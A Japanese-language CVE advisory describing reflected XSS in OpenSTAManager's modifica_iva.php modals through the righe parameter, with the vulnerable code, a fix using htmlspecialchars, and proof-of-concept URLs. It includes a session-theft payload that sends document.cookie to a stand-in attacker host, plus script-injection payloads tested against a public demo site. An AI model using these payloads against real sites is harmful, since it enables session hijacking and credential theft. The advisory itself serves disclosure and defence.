
CVE-2026-24415 - OpenSTAManager は、modifica_iva.php の righe パラメータを介した XSS の影響を受けます
| フィールド | 詳細 |
|---|---|
| CVE ID | CVE-2026-24415 |
| 重要度 | 中 |
| アドバイザリ | アドバイザリを表示 |
| 発見者 | Lukasz Rybak |
OpenSTAManager v2.9.8 には複数の反射型クロスサイトスクリプティング(XSS)脆弱性が存在し、認証されていない攻撃者が細工した URL パラメータを介して、他のユーザーのブラウザコンテキストで任意の JavaScript コードを実行できる可能性があります。これにより、セッションハイジャック、認証情報の窃取、不正な操作につながる可能性があります。
脆弱なパラメータ: righe (GET)
OpenSTAManager v2.9.8 には、請求書・注文・契約の修正モーダルに複数の反射型 XSS 脆弱性が存在します。このアプリケーションは、righe GET パラメータから提供されたユーザー入力を HTML 出力に反映する前に適切にサニタイズしていません。
脆弱なコードの場所:
ファイル: /modules/contratti/modals/modifica_iva.php (125 行目)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
$_GET['righe'] パラメータは、htmlspecialchars() などの関数によるサニタイズを行わずに、HTML の value 属性に直接出力されます。これにより、攻撃者は属性コンテキストから脱出して、任意の HTML/JavaScript を注入できます。
影響を受けるすべてのファイル:
/modules/contratti/modals/modifica_iva.php - 125 行目、167 行目/modules/preventivi/modals/modifica_iva.php - 125 行目、167 行目/modules/fatture/modals/modifica_iva.php - 121 行目、161 行目/modules/ddt/modals/modifica_iva.php - 125 行目、167 行目/modules/ordini/modals/modifica_iva.php - 125 行目、167 行目/modules/interventi/modals/modifica_iva.php - 125 行目、167 行目前提条件:
ステップ 1: ログイン
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
ステップ 2: XSS のトリガー ブラウザで次の URL にアクセスします(または Cookie を指定した curl を使用します):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
テスト済み URL(すべて脆弱):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>期待される結果: 現在のセッション Cookie を表示する JavaScript アラートのポップアップが表示され、コードの実行が確認されます。
HTML 出力(実稼働インスタンスで検証済み):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
検証:
代替ペイロード:
セッション窃取: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
影響を受けるユーザー: 契約、請求書、見積書、または注文モジュールにアクセスできるすべての認証済みユーザー。
攻撃シナリオ:
推奨される修正:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
この修正を「詳細」セクションに記載されているすべての影響を受けるファイルに適用してください。
この CVE は、協調的脆弱性開示の慣行に従って責任を持って開示されました。ここに記載されている情報は、教育目的および防御目的のためにのみ提供されています。